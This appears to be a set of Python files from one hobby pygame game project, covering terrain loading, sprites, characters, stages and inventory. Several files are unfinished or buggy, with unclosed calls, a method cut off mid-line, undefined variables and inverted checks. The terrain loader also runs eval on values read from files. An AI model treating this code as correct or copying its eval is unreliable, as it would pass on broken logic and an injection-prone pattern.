t, *CharacterImage.find_closest_of(t, '*')))
truecoord = CharacterImage.find_closest_of(
t, '*')[0], CharacterImage.find_closest_of(t, '*')[1]
print(CharacterImage.get_topleft_coord(t, *truecoord),
CharacterImage.get_topleft_coord(t, *CharacterImage.find_closest_of(t, '*')))
# s.start_thread(CharacterImage.get_topleft_coord(t, *CharacterImage.find_closest_of(t, '#')), a)
# for i in range(100):
# i = CharacterImage('test', WeaponDummy(testsurf), (0,0), {}, {})
# i.start_thread((0, 0 ), a)
pause = events.Pause()
s = CharacterImage('test', WeaponDummy(testsurf),
CharacterImage.get_topleft_coord(t, *truecoord), {}, {})
print(CharacterImage.get_topleft_coord(t, *truecoord))
s.start_thread((800, a, t)
while True:
# a.blit(PICS['Maps']['army'], CharacterImage.get_topleft_coord(t, *CharacterImage.find_closest_of(t, '*')))
# s.build_image(a)
for i in pg.event.get():
if i.type == QUIT:
print('hello?')
# cleanup and saving and stuff like that can go here, but for now time.sleep tests it.
# always remove the pause from _internal_events before putting Quit
os._exit(0)
# import time; time.sleep(1)
try:
pg.display.update()
a.fill(COLOURS['black'])
a.blit(t_surf, (0, 0))
except pg.error:
# os._exit is about to be called in a seperate thread
pass
print('updated')
CLOCK.tick(FPS)
if __name__ == '__main__':
main()
from pprint import pprint
import pygame as pg
try:
from _internal import COLOURS
except ImportError:
from ._internal import COLOURS
LARGEICONSIZE = 10
class InventoryHandler:
def __init__(self, sizex, sizey):
self.datas = [[None for i in range(sizey)] for i in range(sizex)]
#print(self.datas)
#print(self.datas)
def sort_dict(self, dictionary):
"""
sorts dictionary shaped like: {'1x2': whatever} and puts it into
the internal 2d list.
"""
#print(self.datas)
for indexes in sorted(dictionary):
x = int(indexes.split('x')[0])
y = int(indexes.split('x')[1])
# print(x, y)
# print("self.datas[{}][{}] = dictionary['{}']".format(
# x - 1, y - 1, indexes))
self.datas[x - 1][y - 1] = dictionary[indexes]
#print(self.datas)
def build(self, surf=None, topright=(0, 0), gap=7, bgcolour=COLOURS['black'], padding=2):
"""
creates the surface of the inventory image
:param surf: pass a surface if you want the image to be appended to the surface
:param topright:the topright corner for the blitting to start
:param gap: gap between blocks
:param bgcolour: the background colour of the blocks
:param padding: the padding on the edge of the surface
:return: the new/appended surface
"""
lengthx, lengthy = 0, 0
blacksurf = pg.Surface((LARGEICONSIZE, LARGEICONSIZE))
blacksurf.fill(bgcolour)
# need to calculate dimensions of surface
lenarry = len(self.datas)
lenarrx = len(self.datas[0]) # length of the first element == all the others
for i in range(lenarrx):
lengthx += (gap + LARGEICONSIZE)
lengthx += (padding * 2) # the padding must be multiplied by 2, for both sides
lengthx -= (LARGEICONSIZE - (padding + 1))
for i in range(lenarry):
lengthy += (gap + LARGEICONSIZE)
lengthy += (padding * 2)
lengthy -= (LARGEICONSIZE - (padding + 1))
if surf is None:
surf = pg.Surface((lengthx, lengthy))
surf.fill((255, 255, 255))
where_to_blit = list(map(lambda x: padding + x, topright))
for x in range(lenarry):
for i in range(lenarrx):
# print('where to blit:', where_to_blit)
surf.blit(blacksurf, where_to_blit)
where_to_blit[0] += (LARGEICONSIZE + gap)
where_to_blit[0] = (padding + topright[0]) # reset X coordinates
where_to_blit[1] += (LARGEICONSIZE + gap)
return surf
if __name__ == '__main__':
a = InventoryHandler(2, 3)
s = {
'1x1': '0',
'1x2': '1',
'1x3': '2',
'2x1': '3',
'2x2': '4',
'2x3': '5',
}
a.sort_dict(s)
# pprint(a.datas)
pg.image.save(a.build(), r'C:\Users\Michael\Desktop\image.png')
from bs4 import BeautifulSoup
from urllib.request import urlopen
import random
class Joker:
def __init__(self):
parser = BeautifulSoup(
urlopen('https://michael78912.github.io/puns.html'), 'lxml')
self.division = parser.p.get_text().split('\n')[2:-1]
self.joke = random.choice(self.division).strip()
def say_joke(self):
print(self.joke)
def new_joke(self):
self.joke = random.choice(self.division)
print(Joker().joke)
"""klass.py (I know it's spelt wrong, OK)?
base class for all character classes in SMNW. handles
image generation, spawning, and default movement, and attacking.
"""
import random
from . import terrain
from .character_image import CharacterImage
from .smr_error import SMRError
BEIGE = (232, 202, 145)
class Class:
"""
base class for stickman ranger classes.
"""
# I, personally think that a character class in a reasonably large
# game should be allowed to have at least a few more attributes than
# seven. I am so, so, sorry if you hate me, pylint.
# and too many arguments to __init__? whats that about?
# pylint: disable=too-many-instance-attributes, too-many-arguments
attack_radius = 0
chance_of_motion = 4
max_motion = 3
jump_height = 10
_chance_of_update = 2
def __init__(
self,
type_,
player_num,
weapon,
main_game_state,
stats=(50, 0, 0, 0, 0),
spec=None,
):
# the following two lines of code may seem redundant, but for a reason.
try:
self.health, self.str_, self.dex, self.mag, self.spd = stats
except ValueError:
raise SMRError('invalid length of tuple "stat" argument')
self.stats = stats
self.player_num = player_num
self.weapon = weapon
self.image = CharacterImage(
type_, weapon, (0, 0), main_game_state)
self.type_ = type_
self.spec = spec
def __repr__(self):
return """character number {} type {}""".format(self.player_num, self.type_)
def hit(self, damage):
'takes damage by specified amount'
self.health -= damage
def heal(self, damage):
'heals by specified amount'
self.health += damage
def level_up(self, *args):
'raises characters stats by specified amount'
assert len(args) > 6, 'Too many stats to raise'
if self.spec is None:
if not None in args:
self.spec = args[-1]
else:
raise TypeError(
'Cannot assign a special value to class, cannot support special value.'
)
# add stats
for index in enumerate(args):
self.stats[index] += args[index]
def spawn_on_screen(self, game_state):
"""adds the character to the screen, the very beginning,
on the top, but not above or underground.
"""
# surface.blit(self.image, surface.terrain.array[0])
display = game_state['MAIN_DISPLAY_SURF']
x = 15 # we always want to spawn characters at x=15.
y = game_state['_STAGE_DATA']['stage'].terrain.get_spawn_point(x, self.image.sizey)
self.image.update_coords((x, y))
self.image.build_image(display, BEIGE)
def update(self, game_state):
"""attempt to move, and attack."""
terrain_obj = game_state['_STAGE_DATA']['stage'].terrain
self.weapon.update()
current_block_x = terrain_obj.px_to_blocks(self.image.topleft[0])
current_block_y = terrain_obj.px_to_blocks(self.image.topleft[1])
next_column = list(
terrain_obj.terrain2dlist_texts[terrain_obj.template]['text'][:, current_block_x + 1])
top_levels = {i if obj == '*' else None for i,
obj in enumerate(next_column)}
top_levels.remove(None)
#underground = terrain.is_underground(self.image.topleft, terrain_obj, self.image.sizey - 3)
can_move = True
# if underground:
# print(self, "is underground!")
# self.image.update_coords((self.image.x, self.image.y - 1))
if top_levels:
# Umm, there is nowhere to go. whoever made this terrain file is
# a complte asshole, doing this to these poor characters. :(
print(Warning('there is no top level terrain for the character to go'))
else:
# get how far they would have to move.
distance = terrain_obj.blocks_to_px(
min([current_block_y - i for i in top_levels]) + 1)
print('has to climb %d pixels' % distance)
if 0 < distance <= self.jump_height:
print('howdy. jumping...')
# 10 pixels is the maximum a player can climb, without any sort of tool.
self.image.update_coords((self.image.x, self.image.y - 12))
elif distance > self.jump_height:
# can not jump, and can not move. stay still.
print('cannot move')
can_move = False
in_air = terrain.is_in_air(self.image.topleft, terrain_obj, 5)
if in_air:
self.image.update_coords(
(self.image.topleft[0], self.image.topleft[1] + 1))
print(self, "needs to fall")
try:
motion_target = get_closest_enemy(
game_state, self.image.topright[0])
except ValueError:
# no more enemies remaining, `min` will raise a ValueError.
return
target_x = motion_target.pos[0]
x = self.image.topright[0]
distance = target_x - x if target_x >= x else x - target_x
if distance <= self.weapon.range:
# self.weapon.attack_enemy(motion_target)
self.attack(motion_target)
print(((self.image.topright[0] - target_x) if self.image.topright[0] > target_x else (target_x - self.image.topright[0])))
can_move = random.randint(0, self.chance_of_motion) == 1 and can_move
# can_move = can_move and ((self.image.topright[0] - target_x) if self.image.topright[0] > target_x else (target_x - self.image.topright[0]))
can_move = can_move and distance >= self.weapon.range
if can_move:
print(self, "moving...")
self.image.move_to_x(self.image.topright[0] + self.max_motion,
game_state['MAIN_DISPLAY_SURF'],
pixels=random.randint(1, self.max_motion))
if game_state['MOUSEDOWN']:
if self.image.rect.collidepoint(game_state['MOUSE_POS']):
self.image.update_coords(game_state['MOUSE_POS'])
# game_state['MAIN_DISPLAY_SURF'].blit(self.picture, self.image.topright)
update = random.randint(0, self._chance_of_update) == 1
if distance <= self.weapon.range:
update = False
if not self.image.has_drawn:
# needs to draw at least once. override.
update = True
self.image.build_image(
game_state['MAIN_DISPLAY_SURF'], BEIGE, rebuild=update)
def attack(self, target):
"""attack the target enemy."""
if self.weapon.can_attack():
self.weapon.attack_enemy(target)
def get_closest_enemy(game_state, pos):
"""get and return the closest enemy to pos."""
possible_destinations = [enemy.pos[0]
for enemy in game_state['_STAGE_DATA']['enemies']]
print(possible_destinations)
distances = [pos - i if i <= pos else i -
pos for i in possible_destinations]
distance = min(distances)
return game_state['_STAGE_DATA']['enemies'][distances.index(distance)]
try:
from _internal import *
from smr_error import SMRError
except ImportError:
from ._internal import *
from .smr_error import SMRError
import pygame as pg
col = COLOURS
class MyRect(pg.Rect):
"""this class is simply for keeping track of
when boxes are shaded"""
shaded = False
_accumval = 0
underlined = False
PicInside = None
PicReprInside = ''
def __init__(self, *args, colour=col['white']):
pg.Rect.__init__(self, *args)
self.colour = colour
def shade(self, Surface, Colour='gray'):
#if not self.Shaded:
if type(Colour) not in (str, tuple, list):
raise TypeError(
'Colour argument must be string or RGB sequence.')
if type(Colour) == str:
try:
Colour = col[Colour] # convert the string to RGB tuple
except KeyError:
raise Exception(
'The Colour {} could not be found. please specify an RGB tuple instead'.
format(Colour))
new_surf = pg.Surface((self.width, self.height))
new_surf.set_alpha(75)
new_surf.fill(Colour)
Surface.blit(new_surf, (self.x, self.y))
#else:
# raise SMRError('The Box is already shaded')
def unshade(self, Surface, OrigSurf):
"""
practically the opposite of shade.
unshades the box, which is crucial.
"""
#if self.Shaded:
self.Shaded = False
filler = (255, 255, 255)
new_surf = pg.Surface((self.width, self.height))
new_surf.fill(filler)
Surface.blit(new_surf, (self.x, self.y))
Surface.blit(OrigSurf, (self.x, self.y))
#else:
#raise SMRError('you cannot unshade an unshaded box!')
def draw(self, surface):
if self.shaded:
self.shade(surface)
def handle(self, event, Surface, OrigSurf, colour='gray'):
"""
handles an event. chooses to unshade if criteria is met, an all-in-one
function.
"""
x, y = event.pos
if self.collidepoint(x, y) and not self.Shaded:
self.shade(Surface, colour)
elif not self.collidepoint(x, y) and self.Shaded:
self.unshade(Surface, OrigSurf)
def underline(self, Surface, colour='black'):
"""
similar to shade, but instead of shading, it
will underline the rect.
"""
if self.underlined: # make sure you are not underling the rect again
raise SMRError('the rect is already underlined')
if type(colour) == str: # same as before
try:
Colour = col[colour] # convert the string to RGB tuple
except KeyError:
raise Exception(
'The Colour {} could not be found. please specify an RGB tuple instead'.
format(Colour))
self.underlined = True
pg.draw.line(Surface, Colour, self.bottomright, self.bottomleft)
def remove_underline(self, Surface):
"""
appears to remove underline
by just drawing a blank
line over it.
"""
if not self.underlined:
raise SMRError('the box is not underlined')
pg.draw.line(Surface, (255, ) * 3, self.bottomright, self.bottomleft)
self.underlined = False
def draw_inside(self, pic, surf):
"""
draws a picture inside of self.
sets 2 properties, PicReprInside = repr(pic)
and PicInside = pic.
"""
if self.PicReprInside:
raise SMRError('there is already a picture in this box.')
_Box((self.width, self.height), self.colour, (self.x, self.y), surf,
255, pic)
self.PicReprInside = repr(pic)
self.PicInside = pic
def remove_pic(self, surf):
"""
removes the picture from inside self.
"""
_Box((self.width, self.height), self.colour, (self.x, self.y), surf)
self.PicInside = None
self.PicReprInside = ''
def _Box(size, colour, pos, surface, alpha=None, image=None) -> tuple:
"""
return a square rectangle, surface pair
uses MyRect
"""
print(pos)
new_surf = pg.surface.Surface(size)
new_surf.fill(colour)
if alpha is not None:
new_surf.set_alpha(alpha)
surface.blit(new_surf, pos)
if image is not None:
surface.blit(image, pos)
return MyRect(new_surf.get_rect(topleft=pos)), new_surf
import numpy
import timeit
print('hi')
timeit.timeit('''
big_list = [['hi'] * 1000] * 1000
for i in big_list:
for s in i:
pass''')
print(time.time(), 'after loops')
"""
progress_bar.py
contains one class, ProgressBar, that is basically,
just a progress bar!"""
import pygame
import math
class ProgressBar:
"""
makes a progress bar
example:
a = ProgressBar(3, (0, 0), (50, 20))
a.draw(display)
# makes a 50x20 gray bar in top right corner
a.increment(1)
# put it forward once
"""
def __init__(self, increments_to_full, pos, width, height, alpha=200, righttoleft=True, colour=(211, 211, 211)):
self.increments_to_full = increments_to_full
self.pos = pos
self.width = width
self.height = height
self.colour = colour
self.righttoleft = righttoleft
self.full = 0
self.first_surf = pygame.surface.Surface((width, height))
self.first_surf.set_alpha(alpha)
self.first_surf.fill(colour)
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __gt__(self, other):
return self.increments_to_full > other.increments_to_full
def __lt__(self, other):
return self.increments_to_full < other.increments_to_full
def __ne__(self, other):
return self.__dict__ != other.__dict__
def draw(self, surface):
surface.blit(self.first_surf, self.pos)
def increment(self, surface, increment, auto_update=True):
"""
increment the progress bar by increment.
"""
increment_size = (self.width // increment, self.height)
self.full += increment_size
if self.increments_to_full - self.full < increment_size[0]:
self.first_surf = pygame.surface.Surface((self))
self.
import pygame as pg
try:
from _internal import PICS
from sprite import SMRSprite
except ImportError:
from .sprite import SMRSprite
from ._internal import PICS
class Projectile(SMRSprite):
"""
Projectile, is as expected a projectile.
It is used as a subclass for other types of projectiles.
"""
def __init__(self, img, motion, colour, pos, main_game_state):
SMRSprite.__init__(self, main_game_state, None, pos)
self.img = PICS['Attacks'][img][colour]
self.motion = motion
def get_path(self, target, set_property=True):
if self.motion == ARC:
path = self.get_parabola(target)
elif self.motion == STRAIGHT:
raise NotImplementedError('the method is not implemented')
# path = self.get_straight_path(target)
else:
raise TypeError('%s is not a valid motion argument' % self.motion)
if set_property:
self.path = path
return path
def get_straight_path(self, target):
"""
returns a list of a line, similar to
get_parabola, but a straight line.
"""
x1, x2 = self.topleft
y1, y2 = target
m = (y2 - y1) / (x - x1)
def get_parabola(self, target):
"""
finds and returns a parabola,
in the form of a path, for the projectile to
move along.
"""
pt2 = tarx, tary = target
pt1 = charx, chary = self.topleft
array = []
i = charx
while i <= 610 and i >= -1000:
array.append((i, round((chary - tary) / ((charx-tarx)*(charx-tarx)) * pow((i - tarx), 2) + tary)))
if tarx >= charx:
i += 1
else:
i -= 1
return array
STRAIGHT = 0
ARC = 1
import random
import copy
class Screen:
firstrun = True
"""Screen is a piece of a stage.
each stage can have any number of screens, and must have
a boss screen.
all_enemies is a dictionary, with keys of enemies, and values of
the amount that enemy shoud spawn. ex:
{
SomeEnemy('blue', blablabla, 88): 10
}
will spawn 10 of SomeEnemy in this screen.
"""
def __init__(
self,
all_enemies,
spawn_mode='random',
# must put Y coordinate for each enemy to spawn
):
# assert len(
# all_enemies) == len(num_of_enemies_per_enemy
# ), "the enemies and quantities do not match"
# self.all_enemies = all_enemies
# self.num_of_enemies_per_enemy = num_of_enemies_per_enemy
# if spawn_mode == 'random':
# new_spawn_mode = []
# for enemy, quantity in zip(all_enemies, num_of_enemies_per_enemy):
# for i in range(quantity):
# new_spawn_mode.append((0 if enemy.area == 'ground' else
# random.randint(1, 600), random.randint(1, 600)))
# self.spawn_mode = new_spawn_mode
# else:
# self.spawn_mode = spawn_mode
self.total_enemies = sum(all_enemies.values())
self.enemies = []
for i in all_enemies:
self.enemies += [copy.copy(i) for x in range(all_enemies[i])]
if spawn_mode == 'random':
self.spawn_mode = [random.randint(1, 800) \
for i in range(self.total_enemies)
]
else:
self.spawn_mode = spawn_mode
def draw(self, game_state):
"""draw enemies on screen."""
terrain = game_state['_STAGE_DATA']['stage'].terrain
if self.firstrun:
game_state['_STAGE_DATA']['enemies'] = []
for enemy, x in zip(self.enemies, self.spawn_mode):
ground_level = terrain.get_spawn_point(x, terrain.blocks_to_px(enemy.size))
enemy.draw((x, ground_level), game_state['MAIN_DISPLAY_SURF'])
game_state['_STAGE_DATA']['enemies'].append(enemy)
for player in game_state['PLAYERS']:
player.spawn_on_screen(game_state)
self.firstrun = False
else:
for enemy in self.enemies:
enemy.move(game_state["PLAYERS"], game_state["MAIN_DISPLAY_SURF"], game_state['_STAGE_DATA']['stage'].terrain)
enemy.update(game_state)
for player in game_state['PLAYERS']:
player.update(game_state)
class PeacefulScreen(Screen):
def __init__(self):
super().__init__((), (), None)
from distutils.core import setup
import py2exe
setup(console=['terrain.py'])
"""smr_error.py- base class for
stickmanranger errors.
"""
class SMRError(Exception):
"""
base class for stickmanranger errors
"""
pass
"""
this is the base class for basically anything
that moves in this game.
"""
__author__ = 'Michael Gill <michaelveenstra12@gmail.com>'
__version__ = '0.0'
from queue import Queue
import pprint
import threading
import pygame as pg
try:
from events import Quit, SayHello
from terrain import Terrain
except ImportError:
from .events import Quit, SayHello
from .terrain import Terrain
class SMRSprite:
sizey = 0
sizex = 0
"""
this is the base class for everything that can move
in this game. enemies, attacks, weapons, and projectiles.
_mainloop does nothing in this base class, it is just there
because it is called by start_thread.
"""
def __init__(self, main_game_state, event_queue, pos):
self.main_game_state = main_game_state
self.event_queue = event_queue
self._internal_events = Queue()
self.topleft = pos
self.bottomleft = pos[0], pos[1] + self.sizey
self.topright = pos[0] + self.sizex, pos[1]
self.bottomright = pos[0] + self.sizex, pos[1] + self.sizey
def internal_event(self, ev):
self._internal_events.put(ev)
@staticmethod
def find_closest_of(terrain, block, x=0):
"""
finds the first solid part of terrain, and returns the
index as a tuple.
"""
terrain2d = terrain.terrain2dlist_texts[terrain.template]['text']
if terrain.use_numpy:
line = terrain2d[:, x]
else:
line = [i[0] for i in terrain2d]
# print(line)
for iblock, index in zip(line, range(len(line))):
# this is going the correct way, I believe
# print(line, block)
if iblock == block:
return x, index
else:
raise TypeError('there are no %a symbols in %a' % (block, line))
@classmethod
def get_topleft_coord(cls, terrain, x, y):
"""
returns the correct coordinate
from terrain, in pixels, rather than blocks.
"""
template = terrain.terrain2dlist_texts[terrain.template]
blk_size = template['size']
x_line_size_pixels = len(
template['text'][:, x]) * blk_size if terrain.use_numpy else len(
[i[0] for i in template['text']]) * blk_size
y_line_size_pixels = len(template['text'][0]) * blk_size
new_x = x * blk_size
new_y = y * blk_size
assert new_x < x_line_size_pixels and new_y < y_line_size_pixels, 'the coordinate is too big for the screen'
return (new_x - cls.sizex, new_y - cls.sizey)
# this is all correct so far
def update_coords(self, pos):
self.topleft = pos
self.x, self.y = pos
self.bottomleft = pos[0], pos[1] + self.sizey
self.topright = pos[0] + self.sizex, pos[1]
self.bottomright = pos[0] + self.sizex, pos[1] + self.sizey
def game_quit(self):
"""
request a quit from the actual game, if needed.
"""
self.event_queue.put(Quit())
def kill_thread(self):
"""
attempts to kill the current thread, with
cleanup (removes character from screen, etc...)
"""
self._internal_events.put(Quit())
def start_thread(self, daemon=True):
"""
starts a new thread and redirects it to _mainloop.
daemon is default to true.
"""
self.mainthread = threading.Thread(
target=self._mainloop, daemon=daemon)
self.mainthread.start()
def _mainloop(self):
while 1:
if self._internal_events.empty():
pass
else:
self._internal_events.get()()
# used for debugging
print(threading.current_thread())
if __name__ == '__main__':
d = Terrain('dirt', 'test', use_numpy=True)
# print([i.tolist() for i in d.terrain2dlist_texts['test']['text']])
s1, s2 = SMRSprite.find_closest_of(d, '#')
print(s1, s2)
# print(s1, s2)
# s = repr(list([list(i) for i in d.terrain2dlist_texts[d.template]['text']]))
# a = list([list(i) for i in d.terrain2dlist_texts[d.template]['text']])
# print(a)
print(SMRSprite.get_topleft_coord(d, s1, s2))
from threading import Thread
from pygame.locals import QUIT, MOUSEBUTTONDOWN, MOUSEBUTTONUP, MOUSEMOTION, KEYDOWN
import pygame as pg
import os
WHITE = (255, 255, 255) # unbeaten
GRAY = (211, 211, 211) # beaten
TEAL = (0, 128, 128) # peaceful
YELLOW = (128, 128, 0)
BLACK = (0, 0, 0)
STAGE_SIZE = (15, 15)
class Stage:
unlocked = False
beaten = False
rect_padding = 8
game_state = {}
def __init__(
self,
name,
# name to be used by the game
position_on_map,
# (x, y) cartesian system
all_screens,
# list\tuple of all screens in stage
boss_screen,
# the screen of the boss
terrain,
# the terrain class
comes_from,
# stage that you beat to unlock it (first level is None, shouldn't
# ned to put None again)
surface,
# map that the stage must be drawn on
peaceful=False,
# peaceful stage is a shop or of the like
has_icon=True,
# False if level shows upon map already, or is secret
links_to=None,
# list\tuple of all stages it links to,
decorations=(),
# tuple of decorations to be drawn
):
if comes_from is None:
comes_from = _NullStage
self.position_on_map = position_on_map
self.all_screens = all_screens
self.comes_from = comes_from
self.drawing_surface = surface
self.peaceful = peaceful
self.has_icon = has_icon
self.links_to = links_to
self.name = name
self.terrain = terrain
self.decorations = decorations
# print(os.getcwd())
with open(os.path.join(
os.getcwd(), 'music', 'smnwgameplay.mp3'
)):
print('opened successfully')
self.music = os.path.join('music', 'smnwgameplay.mp3')
self.rect = pg.Rect(position_on_map, STAGE_SIZE)
rect = self.rect
left, top, width, height = rect.left, rect.top, rect.width, rect.height
self.box = pg.Rect(left - self.rect_padding, top - self.rect_padding,
width + (self.rect_padding * 2), height + (self.rect_padding * 2)
)
def draw_on_map(self):
surface = self.drawing_surface
if self.comes_from.beaten and self.has_icon:
self.rect = pg.draw.rect(
surface, WHITE, self.position_on_map + STAGE_SIZE)
elif self.beaten and self.has_icon:
self.rect = pg.draw.rect(
surface, GRAY, self.position_on_map + STAGE_SIZE)
if self.peaceful and self.has_icon:
self.rect = pg.draw.rect(
surface, TEAL, self.position_on_map + STAGE_SIZE)
def check_hover(self, pos):
"""check to see if the mouse is hovering over. if it is,
dislpay a box around the level, and a name.
"""
# print(left, top, width, height)
if self.box.collidepoint(*pos):
box = self.box
pg.draw.rect(self.drawing_surface, YELLOW, box, 1)
fontobj = pg.font.Font(os.path.join('data', 'MICHAEL`S FONT.ttf'), 20)
fontobj.set_bold(True)
surf = fontobj.render(self.name, True, BLACK)
surfrect = surf.get_rect()
surfrect.center = pos[0], pos[1] - 40
self.drawing_surface.blit(surf, surfrect)
def start_music(self):
"""stop old music, play new music."""
if not self.peaceful:
# keep the theme music if it is a peaceful screen.
pg.mixer.music.fadeout(2000)
print('howdy?')
pg.mixer.music.load(self.music)
pg.mixer.music.play(-1)
def init(self, game_state):
"""run the stage."""
self.game_state = game_state
Thread(target=self.start_music).start()
game_state['_STAGE_DATA'] = {
'screen_number': 0,
'screen': self.all_screens[0],
'stage': self,
}
def update(self, events):
"""update the stage, and everything related to it."""
state = self.game_state
terrain_surf = self.terrain.build_surface()
display = state['MAIN_DISPLAY_SURF']
display.fill((0, 0, 0))
current_screen = self.all_screens[state['_STAGE_DATA']['screen_number']]
display.blit(terrain_surf, (0, 0))
current_screen.draw(state)
letters = []
for event in events:
check_quit(event)
if event.type == MOUSEBUTTONDOWN:
state['MOUSEDOWN'] = True
elif event.type == MOUSEMOTION:
state['MOUSEDOWN'] = False
elif event.type == KEYDOWN:
letters.append(event.unicode)
if letters:
pass
if '~' in letters:
print('open terminal...')
def check_quit(event):
"""check if event is a quit event. if it is, quit."""
if event.type == QUIT:
pg.quit()
raise SystemExit
class _NullStage(Stage):
def __init__(self):
pass
position_on_map = None
all_screens = None
comes_from = None
drawing_surface = None
peaceful = None
has_icon = None
links_to = None
beaten = True
# d = pg.Surface((100, 100))
# d.fill((255, 255, 255))
# s = Stage(
# "Test Stage 0.0",
# position_on_map=(18, 569),
# all_screens=[PeacefulScreen],
# boss_screen=None,
# surface=d,
# terrain=Terrain('dirt', 'flat'),
# comes_from=None,
# peaceful=True,
# )
# s.draw_on_map()
# s.check_hover((100, 100))
# pg.image.save(d, r'C:\Users\Michael\Desktop\test_images\howdy.png')
try:
from _internal import *
except ImportError:
from ._internal import *
class StatusAilment:
def __init__(self, colour):
self.colour = colour
"""terrain.py
takes all terrain files (terrain/*) and converts them
into stickmanranger terrain objects.
NOTE: may want to run this code in a background thread,
as it will probably take a while and cause graphics
to crash.
"""
__author__ = 'Michael Gill'
__version__ = '0.0'
from pprint import pprint
import os
import sys
from pygame.surface import Surface
from pygame.transform import scale
from pygame.locals import QUIT
import numpy
try:
from _internal import *
from smr_error import SMRError
except ImportError:
from ._internal import *
from .smr_error import SMRError
VALID_COMMANDS = ('air', 'water', 'size')
# there once was a fellow named finn
# who threw all his legs in a bin
# he realized, at last
# he could not move so fast
# and punched himself right in the chin.
class Terrain:
top_water = PICS['Other']['top_water']
surface_symbol = '*'
ground_symbol = '#'
water_symbol = '-'
air_symbol = '~'
sign_symbol = '^'
pit_symbol = '_'
top_water_symbol = '+'
# alpha values. can be overriden with headers. (see flat.smr-terrain)
air = 200
water = 100
def_air = (0, 0, 0, 200)
def_water = (0, 50, 200, 100)
def __init__(self, image, template='flat', block_size=10, use_numpy=True):
self.image1 = PICS['terrain_templates'][image]['1']
self.image2 = PICS['terrain_templates'][image]['0']
self.template = template
self.size = block_size
self.use_numpy = use_numpy
try:
Terrain.terrain2dlist_texts
except AttributeError:
self.load_text()
def __iter__(self):
for i in self.terrain2dlist:
yield i
def __getitem__(self, pos):
arr = self.terrain2dlist_texts[self.template]['text']
return arr[pos[1]][pos[0]]
def __eq__(self, other):
return self.__dict__ == other.__dict__
def get_solid(self, pos):
"""return true if the block at pos is solid."""
return self.is_solid(self[pos])
@staticmethod
def is_solid(item):
return item in (Terrain.ground_symbol, Terrain.surface_symbol)
@staticmethod
def is_water(item):
return item in (Terrain.water_symbol, Terrain.top_water_symbol)
@staticmethod
def is_pit(item):
return item == Terrain.pit_symbol
@staticmethod
def is_air(item):
return item == Terrain.air_symbol
def load_text(self):
try:
Terrain.terrain2dlist_texts
except AttributeError:
Terrain.terrain2dlist_texts = {}
all_texts = Terrain.terrain2dlist_texts
terrain_texts = {}
terrain2dlist_texts = {}
for text in os.listdir(TDIR):
a = text.split('.')[0]
terrain_texts[a] = open(os.path.join(TDIR, text)).read()
for terrain, key in zip(terrain_texts.values(), terrain_texts.keys()):
main_dict = {
'size': self.size,
'air': self.def_air,
'water': self.def_water
}
if terrain.startswith('@'):
# remove @ symbol
header = terrain.split('\n')[0][1:]
terrain = '\n'.join(terrain.split('\n')[1:])
header = header.split('|')
# remove all whitespace
header = [part.strip().replace((' '), '')
.replace('\n', '')
.replace('\r', '')
.replace('\t', '')
for part in header]
for command in header:
parts = command.split('=')
print
if not parts[0] in ('air', 'water', 'size'):
raise SyntaxError(
'%a is not a valid command for header' % parts[0])
else:
main_dict[parts[0]] = eval(parts[1])
lines = []
for line in terrain.split('\n'):
if ';' in line:
line = line.split(';')[0].strip()
# dont append blank lines!
if line != '':
lines.append(line)
terrain2dlist = []
for line in lines:
chars = []
for char in line:
chars.append(char)
terrain2dlist.append(chars if not self.use_numpy
else numpy.array(chars))
main_dict['text'] = terrain2dlist if not self.use_numpy \
else numpy.array(terrain2dlist)
terrain2dlist_texts[key] = main_dict
Terrain.terrain2dlist_texts = terrain2dlist_texts
def build_surface(self, override=None, display=None):
"""
builds the terrain image and returns it.
also sets self.built_image to the surface.
"""
pit_picture = PICS['Other']['pit']
sign_picture = PICS['Other']['next']
# the surface everything will be added to
big_actual_picture = Surface((800, 400))
if getattr(self, 'decorations', False):
self.decorations[0].draw_all()
# find the 2D list of the specified terrain
template = self.terrain2dlist_texts[self.template]
scale(self.image1, (self.size, ) * 2)
scale(self.image2, (self.size, ) * 2)
if template['size'] is not None:
self.size = template['size']
text = template['text']
air_picture = Surface((self.size, ) * 2)
air_picture.fill(template['air'])
water_picture = Surface((self.size, ) * 2)
water_picture.fill(template['water'])
top_water_picture = self.top_water
_change_colour_surface(top_water_picture, *template['water'][:3])
try:
top_water_picture.set_alpha(template['water'][3])
except IndexError:
# no alpha has been set
print('no alpha set')
for line, index1 in zip(text, range(len(text))):
for block, index2 in zip(line, range(len(line))):
# print(block)
if block == self.ground_symbol:
big_actual_picture.blit(
self.image1, (index2 * self.size, index1 * self.size))
elif block == self.surface_symbol:
big_actual_picture.blit(
air_picture, (index2 * self.size, index1 * self.size))
big_actual_picture.blit(
self.image2, (index2 * self.size, index1 * self.size))
elif block == self.air_symbol:
big_actual_picture.blit(
air_picture, (index2 * self.size, index1 * self.size))
elif block == self.water_symbol:
big_actual_picture.blit(
water_picture,
(index2 * self.size, index1 * self.size))
elif block == self.pit_symbol:
big_actual_picture.blit(
air_picture, (index2 * self.size, index1 * self.size))
big_actual_picture.blit(
pit_picture, (index2 * self.size, index1 * self.size))
elif block == self.top_water_symbol:
big_actual_picture.blit(
air_picture, (index2 * self.size, index1 * self.size))
big_actual_picture.blit(
top_water_picture,
# sign is 30x30 pixels
(index2 * self.size, index1 * self.size))
elif block == self.sign_symbol:
big_actual_picture.blit(
air_picture, (index2 * self.size, index1 * self.size))
big_actual_picture.blit(
sign_picture,
# sign is 30x30 pixels
(index2 * self.size - 20, index1 * self.size - 17))
self.built_image = big_actual_picture
scale(big_actual_picture, (800, 400))
return big_actual_picture
def save(self, filename):
if not self.use_numpy:
raise SMRError('numpy is not in use, no files can be saved')
self.terrain2dlist_texts[self.template].dump(filename)
@classmethod
def save_all(cls, directory):
if not os.path.exists(directory):
os.mkdir(directory)
for file in cls.terrain2dlist_texts:
cls.terrain2dlist_texts[file]['text'].dump(os.path.join(directory, file + '.bin'))
def get_last_unsolid(self, x):
"""get the index of the bottommost air or water block."""
arr = list(self.terrain2dlist_texts[self.template]['text'][:, x - 1])
arr.reverse()
not_solid = ['+', '-', '~']
indices = [arr.index(i) if i in arr else 0 for i in not_solid]
bottom = len(arr) - min(filter(None, indices)) - 1
return bottom
def blocks_to_px(self, blocks):
"""convert the blocks to pixels."""
return round(blocks * self.terrain2dlist_texts[self.template]['size'])
def is_on_solid(self, x, y, size_of_obj):
""" return true if the object is on solid ground. if it is not, return false."""
arr = self.terrain2dlist_texts[self.template]['text'][:, x]
bottom = y + size_of_obj
print(bottom)
bottom_blocks = self.px_to_blocks(bottom)
